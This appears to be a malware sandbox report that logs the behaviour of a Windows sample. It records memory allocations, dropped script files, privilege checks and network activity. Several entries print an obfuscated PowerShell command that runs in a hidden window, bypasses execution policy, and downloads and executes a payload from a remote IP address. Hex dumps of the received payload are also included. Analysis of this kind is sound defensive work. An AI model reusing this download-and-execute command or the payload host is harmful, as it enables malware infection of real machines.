NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\YTDon.vbs
file	C:\Users\Public\YTDon.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 5, 2023, 8:55 a.m.	show_type: 0 filepath_r: Cmd.exe parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: Cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 5, 2023, 8:55 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (5 events)

Data received	.~00~,.~00~,.~0A~,.~7D~,.~4C~,.~00~,.~00~,.~04~,.~02~,.~28~,.~1B~,.~00~,.~00~,.~0A~,.~2A~,.~3A~,.~02~,.~6F~,.~2C~,.~01~,.~00~,.~0A~,.~D2~,.~02~,.~28~,.~BC~,.~00~,.~00~,.~06~,.~2A~,.~32~,.~02~,.~20~,.~C0~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~2A~,.~6A~,.~02~,.~20~,.~CB~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~02~,.~03~,.~28~,.~81~,.~00~,.~00~,.~06~,.~16~,.~1E~,.~6F~,.~4F~,.~00~,.~00~,.~0A~,.~2A~,.~7E~,.~02~,.~20~,.~CA~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~02~,.~03~,.~28~,.~29~,.~01~,.~00~,.~0A~,.~28~,.~7D~,.~00~,.~00~,.~06~,.~16~,.~1A~,.~6F~,.~4F~,.~00~,.~00~,.~0A~,.~2A~,.~7A~,.~03~,.~39~,.~0C~,.~00~,.~00~,.~00~,.~02~,.~20~,.~C3~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~2A~,.~02~,.~20~,.~C2~,.~00~,.~00~,.~00~,.~6F~,.~1A~,.~01~,.~00~,.~0A~,.~2A~,.~1B~,.~30~,.~02~,.~00~,.~00~,.~01~,.~00~,.~00~,.~01~,.~00~,.~00~,.~11~,.~16~,.~0A~,.~38~,.~0E~,.~00~,.~00~,.~00~,.~20~,.~E8~,.~03~,.~00~,.~00~,.~28~,.~14~,.~00~,.~00~,.~0A~,.~06~,.~17~,.~58~,.~0A~,.~06~,.~7E~,.~12~,.~00~,.~00~,.~04~,.~28~,.~15~,.~00~,.~00~,.~0A~,.~32~,.~E5~,.~28~,.~03~,.~00~,.~00~,.~06~,.~3A~,.~06~,.~00~,.~00~,.~00~,.~16~,.~28~,.~16~,.~00~,.~00~,.~0A~,.~00~,.~28~,.~52~,.~00~,.~00~,.~06~,.~3A~,.~06~,.~00~,.~00~,.~00~,.~16~,.~28~,.~16~,.~00~,.~00~,.~0A~,.~7E~,.~0C~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~05~,.~00~,.~00~,.~00~,.~28~,.~26~,.~00~,.~00~,.~06~,.~7E~,.~04~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~05~,.~00~,.~00~,.~00~,.~28~,.~24~,.~00~,.~00~,.~06~,.~7E~,.~10~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~0F~,.~00~,.~00~,.~00~,.~28~,.~4B~,.~00~,.~00~,.~06~,.~39~,.~05~,.~00~,.~00~,.~00~,.~28~,.~5B~,.~00~,.~00~,.~06~,.~28~,.~4F~,.~00~,.~00~,.~06~,.~14~,.~FE~,.~06~,.~49~,.~00~,.~00~,.~06~,.~73~,.~18~,.~00~,.~00~,.~0A~,.~73~,.~19~,.~00~,.~00~,.~0A~,.~6F~,.~1A~,.~00~,.~00~,.~0A~,.~7E~,.~0D~,.~00~,.~00~,.~04~,.~28~,.~17~,.~00~,.~00~,.~0A~,.~39~,.~16~,.~00~,.~00~,.~00~,.~14~,.~FE~,.~06~,.~32~,.~00~,.~00~,.~06~,.~73~,.~18~,.~00~,.~00~,.~0A~,.~73~,.~19~,.~00~,.~00~,.~0A~,.~6F~,.~1A~,.~00~,.~00~,.~0A~,.~DD~,.~06~,.~00~,.~00~,.~00~,.~26~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~00~,.~28~,.~12~,.~00~,.~00~,.~06~,.~3A~,.~0A~,.~00~,.~00~,.~00~,.~28~,.~1E~,.~00~,.~00~,.~06~,.~28~,.~1B~,.~00~,.~00~,.~06~,.~DD~,.~06~,.~00~,.~00~,.~00~,.~26~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~20~,.~88~,.~13~,.~00~,.~00~,.~28~,.~14~,.~00~,.~00~,.~0A~,.~2B~,.~D4~,.~01~,.~1C~,.~00~,.~00~,.~00~,.~00~,.~33~,.~00~,.~9B~,.~CE~,.~00~,.~06~,.~01~,.~00~,.~00~,.~01~,.~00~,.~00~,.~D5~,.~00~,.~19~,.~EE~,.~00~,.~06~,.~01~,.~00~,.~00~,.~01~,.~1B~,.~30~,.~02~,.~00~,.~41~,.~01~,.~00~,.~00~,.~02~,.~00~,.~00~,.~11~,.~28~,.~1C~,.~00~,.~00~,.~0A~,.~7E~,.~07~,.~00~,.~00~,.~04~,.~28~,.~1D~,.~00~,.~00~,.~0A~,.~6F~,.~1E~,.~00~,.~00~,.~0A~,.~80~,.~07~,.~00~,.~00~,.~04~,.~7E~,.~07~,.~00~,.~00~,.~04~,.~73~,.~6F~,.~00~,.~00~,.~06~,.~80~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~01~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~01~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~02~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~02~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~03~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~03~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~04~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~04~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~08~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~08~,.~00
Data received	~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0F~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0F~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0C~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0C~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0D~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0D~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~10~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~10~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~13~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~13~,.~00~,.~00~,.~04~,.~28~,.~2D~,.~00~,.~00~,.~06~,.~80~,.~11~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~0A~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~80~,.~0A~,.~00~,.~00~,.~04~,.~7E~,.~0E~,.~00~,.~00~,.~04~,.~7E~,.~09~,.~00~,.~00~,.~04~,.~6F~,.~72~,.~00~,.~00~,.~06~,.~28~,.~1D~,.~00~,.~00~,.~0A~,.~73~,.~1F~,.~00~,.~00~,.~0A~,.~80~,.~0B~,.~00~,.~00~,.~04~,.~28~,.~04~,.~00~,.~00~,.~06~,.~0A~,.~DD~,.~08~,.~00~,.~00~,.~00~,.~26~,.~16~,.~0A~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~06~,.~2A~,.~00~,.~00~,.~00~,.~41~,.~1C~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~37~,.~01~,.~00~,.~00~,.~37~,.~01~,.~00~,.~00~,.~08~,.~00~,.~00~,.~00~,.~01~,.~00~,.~00~,.~01~,.~1B~,.~30~,.~04~,.~00~,.~51~,.~00~,.~00~,.~00~,.~02~,.~00~,.~00~,.~11~,.~7E~,.~0B~,.~00~,.~00~,.~04~,.~6F~,.~20~,.~00~,.~00~,.~0A~,.~6F~,.~21~,.~00~,.~00~,.~0A~,.~74~,.~33~,.~00~,.~00~,.~01~,.~28~,.~1C~,.~00~,.~00~,.~0A~,.~7E~,.~07~,.~00~,.~00~,.~04~,.~6F~,.~22~,.~00~,.~00~,.~0A~,.~28~,.~77~,.~00~,.~00~,.~06~,.~72~,.~01~,.~00~,.~00~,.~70~,.~28~,.~23~,.~00~,.~00~,.~0A~,.~7E~,.~0A~,.~00~,.~00~,.~04~,.~28~,.~1D~,.~00~,.~00~,.~0A~,.~6F~,.~24~,.~00~,.~00~,.~0A~,.~0A~,.~DD~,.~08~,.~00~,.~00~,.~00~,.~26~,.~16~,.~0A~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~06~,.~2A~,.~00~,.~00~,.~00~,.~01~,.~10~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~47~,.~47~,.~00~,.~08~,.~35~,.~00~,.~00~,.~01~,.~13~,.~30~,.~01~,.~00~,.~A7~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~00~,.~72~,.~0F~,.~00~,.~00~,.~70~,.~80~,.~01~,.~00~,.~00~,.~04~,.~72~,.~C2~,.~00~,.~00~,.~70~,.~80~,.~02~,.~00~,.~00~,.~04~,.~72~,.~C5~,.~01~,.~00~,.~70~,.~80~,.~03~,.~00~,.~00~,.~04~,.~72~,.~A0~,.~02~,.~00~,.~70~,.~80~,.~04~,.~00~,.~00~,.~04~,.~72~,.~53~,.~03~,.~00~,.~70~,.~80~,.~05~,.~00~,.~00~,.~04~,.~72~,.~67~,.~03~,.~00~,.~70~,.~80~,.~06~,.~00~,.~00~,.~04~,.~72~,.~69~,.~03~,.~00~,.~70~,.~80~,.~07~,.~00~,.~00~,.~04~,.~72~,.~C3~,.~03~,.~00~,.~70~,.~80~,.~08~,.~00~,.~00~,.~04~,.~72~,.~9E~,.~04~,.~00~,.~70~,.~80~,.~09~,.~00~,.~00~,.~04~,.~72~,.~F9~,.~16~,.~00~,.~70~,.~80~,.~0A~,.~00~,.~00~,.~04~,.~72~,.~AC~,.~1E~,.~00~,.~70~,.~80~,.~0C~,.~00~,.~00~,.~04~,.~72~,.~5F~,.~1F~,.~00~,.~70~,.~80~,.~0D~,.~00~,.~00~,.~04~,.~72~,.~12~,.~20~,.~00~,.~70~,.~80~,.~0F~,.~00~,.~00~,.~04~,.~72~,.~C5~,.~20~,.~00~,.~70~,.~80~,.~10~,.~00~,.~00~,.~04~,.~14~,.~80~,.~11~,.~00~,.~00~,.~04~,.~72~,.~78~,.~21~,.~00~,.~70~,.~80~,.~12~,.~00~,.~00~,.~04~,.~72~,.~7C~,.~21~,.~00~,.~70~,.~80~,.~13~,.~00~,.~00~,.~04~,.~2A~,.~00~,.~1B~,.~30~,.~07~,.~00~,.~F1~,.~02~,.~00~,.~00~,.~03~,.~00~,.~00~,.~11~,.~18~,.~17~,.~1C~,.~73~,.~25~,.~00~,.~00~,.~0A~,.~25~,.~20~,.~00~,.~C8~,.~00~,.~00~,.~6F~,.~26~,.~00~,.~00~,.~0A~,.~25~,.~20~,.~00~,.~C8~,.~00~,.~00~,.~6F~,.~27~,.~00~,.~00~,.~0A~,.~28~,.~07~,.~00~,.~00~,.~06~,.~7E~,.~0F~,.~00~,.~00~,.~04~,.~72~,.~2F~,.~22~,.~00~,.~70~,.~28~,.~28~,.~00~,.~00~,.~0A~,.~39~,.~E3~,.~00~,.~00~,.~00~,.~7E~,.~02~,.~00~,.~00~,.~04~,.~17~,.~8D~,.~3D~,.~00~,.~00~,.~01~,.~25~,.~16~,.~1F~,.~2C~,.~9D~,.~6F~,.~29~,.~00~,.~00~,.~0A~,.~73~,.~2A~,.~00~,.~00~,.~0A~,.~7E~,.~02~,.~00~,.~00~,.~04~,.~17~,.~8D~,.~3D~,.~00~,.~00~,.~01~,.~25~,.~16~,.~1F~,.~2C~,.~9D~,.~6F~,.~29~,.~00~,.~00~,.~0A~,.~8E~,.~69~,.~6F~,.~2B~,.~00~,.~00~,.~0A~,.~9A~,.~0A~,.~7E~,.~01~,.~00~,.~00~,.~04~,.~17~,.~8D~,.~3D~,.~00
Data received	.~00~,.~91~,.~00~,.~A6~,.~0B~,.~1D~,.~00~,.~14~,.~00~,.~8C~,.~35~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~58~,.~27~,.~1D~,.~00~,.~14~,.~00~,.~DC~,.~35~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~A1~,.~2D~,.~1D~,.~00~,.~14~,.~00~,.~18~,.~37~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~9C~,.~05~,.~1D~,.~00~,.~14~,.~00~,.~5C~,.~37~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~F5~,.~09~,.~1D~,.~00~,.~14~,.~00~,.~78~,.~20~,.~00~,.~00~,.~00~,.~00~,.~86~,.~18~,.~B7~,.~23~,.~0E~,.~00~,.~14~,.~00~,.~A8~,.~37~,.~00~,.~00~,.~00~,.~00~,.~96~,.~00~,.~B9~,.~1A~,.~C3~,.~00~,.~14~,.~00~,.~2C~,.~38~,.~00~,.~00~,.~00~,.~00~,.~96~,.~00~,.~3B~,.~1B~,.~C7~,.~00~,.~14~,.~00~,.~98~,.~38~,.~00~,.~00~,.~00~,.~00~,.~96~,.~00~,.~9F~,.~08~,.~53~,.~00~,.~15~,.~00~,.~A0~,.~42~,.~00~,.~00~,.~00~,.~00~,.~96~,.~00~,.~6D~,.~0B~,.~1D~,.~00~,.~15~,.~00~,.~7B~,.~21~,.~00~,.~00~,.~00~,.~00~,.~91~,.~18~,.~BD~,.~23~,.~0A~,.~00~,.~15~,.~00~,.~9B~,.~21~,.~00~,.~00~,.~00~,.~00~,.~96~,.~00~,.~9F~,.~09~,.~0A~,.~00~,.~15~,.~00~,.~44~,.~43~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~21~,.~20~,.~D8~,.~00~,.~15~,.~00~,.~94~,.~43~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~1D~,.~06~,.~DE~,.~00~,.~16~,.~00~,.~3C~,.~47~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~21~,.~0C~,.~E5~,.~00~,.~19~,.~00~,.~D0~,.~47~,.~00~,.~00~,.~00~,.~00~,.~91~,.~00~,.~77~,.~1D~,.~C3~,.~00~,.~1A~,.~00~,.~00~,.~00~,.~00~,.~00~,.~80~,.~00~,.~91~,.~20~,.~18~,.~03~,.~EA~,.~00~,.~1A~,.~00~,.~00~,.~00~,.~00~,.~00~,.~80~,.~00~,.~91~,.~20~,.~B1~,.~0A~,.~F3~,.~00~,.~1E~,.~00~,.~00~,.~00~,.~00~,.~00~,.~80~,.~00~,.~91~,.~20~,.~53~,.~08~,.~FA~,.~00~,.~20~,.~00~,.~00~,.~00~,.~00~,.~00~,.~80~,.~00~,.~91~,.~20~,.~57~,.~1B
Data received	65~,.~74~,.~5F~,.~55~,.~73~,.~65~,.~72~,.~4E~,.~61~,.~6D~,.~65~,.~00~,.~67~,.~65~,.~74~,.~5F~,.~50~,.~72~,.~6F~,.~63~,.~65~,.~73~,.~73~,.~4E~,.~61~,.~6D~,.~65~,.~00~,.~43~,.~68~,.~65~,.~63~,.~6B~,.~48~,.~6F~,.~73~,.~74~,.~4E~,.~61~,.~6D~,.~65~,.~00~,.~44~,.~61~,.~74~,.~65~,.~54~,.~69~,.~6D~,.~65~,.~00~,.~57~,.~72~,.~69~,.~74~,.~65~,.~4C~,.~69~,.~6E~,.~65~,.~00~,.~67~,.~65~,.~74~,.~5F~,.~4E~,.~65~,.~77~,.~4C~,.~69~,.~6E~,.~65~,.~00~,.~43~,.~6F~,.~6D~,.~62~,.~69~,.~6E~,.~65~,.~00~,.~77~,.~4C~,.~47~,.~62~,.~43~,.~6F~,.~6D~,.~73~,.~43~,.~6D~,.~6C~,.~70~,.~65~,.~00~,.~55~,.~72~,.~69~,.~48~,.~6F~,.~73~,.~74~,.~4E~,.~61~,.~6D~,.~65~,.~54~,.~79~,.~70~,.~65~,.~00~,.~67~,.~65~,.~74~,.~5F~,.~56~,.~61~,.~6C~,.~75~,.~65~,.~54~,.~79~,.~70~,.~65~,.~00~,.~50~,.~72~,.~6F~,.~74~,.~6F~,.~63~,.~6F~,.~6C~,.~54~,.~79~,.~70~,.~65~,.~00~,.~47~,.~65~,.~74~,.~54~,.~79~,.~70~,.~65~,.~00~,.~53~,.~6F~,.~63~,.~6B~,.~65~,.~74~,.~54~,.~79~,.~70~,.~65~,.~00~,.~46~,.~69~,.~6C~,.~65~,.~53~,.~68~,.~61~,.~72~,.~65~,.~00~,.~53~,.~79~,.~73~,.~74~,.~65~,.~6D~,.~2E~,.~43~,.~6F~,.~72~,.~65~,.~00~,.~4D~,.~65~,.~74~,.~68~,.~6F~,.~64~,.~42~,.~61~,.~73~,.~65~,.~00~,.~43~,.~6C~,.~6F~,.~73~,.~65~,.~00~,.~44~,.~69~,.~73~,.~70~,.~6F~,.~73~,.~65~,.~00~,.~50~,.~61~,.~72~,.~73~,.~65~,.~00~,.~53~,.~74~,.~72~,.~52~,.~65~,.~76~,.~65~,.~72~,.~73~,.~65~,.~00~,.~58~,.~35~,.~30~,.~39~,.~43~,.~65~,.~72~,.~74~,.~69~,.~66~,.~69~,.~63~,.~61~,.~74~,.~65~,.~00~,.~43~,.~72~,.~65~,.~61~,.~74~,.~65~,.~00~,.~4D~,.~75~,.~6C~,.~74~,.~69~,.~63~,.~61~,.~73~,.~74~,.~44~,.~65~,.~6C~,.~65~,.~67~,.~61~,.~74~,.~65~,.~00~,.~47~,.~65~,.~74~,.~4B~,.~65~,.~79~,.~62~,.~6F~,.~61~,
Data received	~,.~98~,.~01~,.~A8~,.~D6~,.~00~,.~00~,.~00~,.~00~,.~C3~,.~02~,.~A0~,.~5C~,.~9C~,.~0A~,.~99~,.~01~,.~18~,.~DA~,.~00~,.~00~,.~00~,.~00~,.~83~,.~00~,.~73~,.~60~,.~9C~,.~0A~,.~9A~,.~01~,.~30~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~B6~,.~5C~,.~A7~,.~0A~,.~9B~,.~01~,.~4C~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C3~,.~02~,.~C1~,.~5C~,.~07~,.~03~,.~9B~,.~01~,.~54~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~86~,.~00~,.~7E~,.~60~,.~A7~,.~0A~,.~9B~,.~01~,.~68~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~CC~,.~5C~,.~A7~,.~0A~,.~9B~,.~01~,.~7C~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~E2~,.~5C~,.~A7~,.~0A~,.~9B~,.~01~,.~90~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~ED~,.~5C~,.~A7~,.~0A~,.~9B~,.~01~,.~A4~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~F8~,.~5C~,.~A7~,.~0A~,.~9B~,.~01~,.~B8~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~03~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~CC~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~0E~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~E0~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~19~,.~5D~,.~AD~,.~0A~,.~9B~,.~01~,.~F4~,.~DC~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~24~,.~5D~,.~AD~,.~0A~,.~9B~,.~01~,.~08~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~2F~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~10~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~3A~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~18~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~45~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~20~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~50~,.~5D~,.~AD~,.~0A~,.~9B~,.~01~,.~28~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~5B~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~30~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~66~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~38~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~71~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~40~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~7C~,.~5D~,.~AD~,.~0A~,.~9B~,.~01~,.~48~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~87~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~5C~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~92~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~70~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~9D~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~84~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~A8~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~98~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~B3~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~AC~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~BE~,.~5D~,.~A7~,.~0A~,.~9B~,.~01~,.~C0~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~C9~,.~5D~,.~AD~,.~0A~,.~9B~,.~01~,.~D4~,.~DD~,.~00~,.~00~,.~00~,.~00~,.~C6~,.~00~,.~D4~,.~5D~,.~AD~,.~0A~,.~9B~,

Poweshell is sending data to a remote host (1 event)

Data sent

GET /coder.jpg HTTP/1.1 Host: 45.138.16.89:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 5, 2023, 8:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

45.138.16.89

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
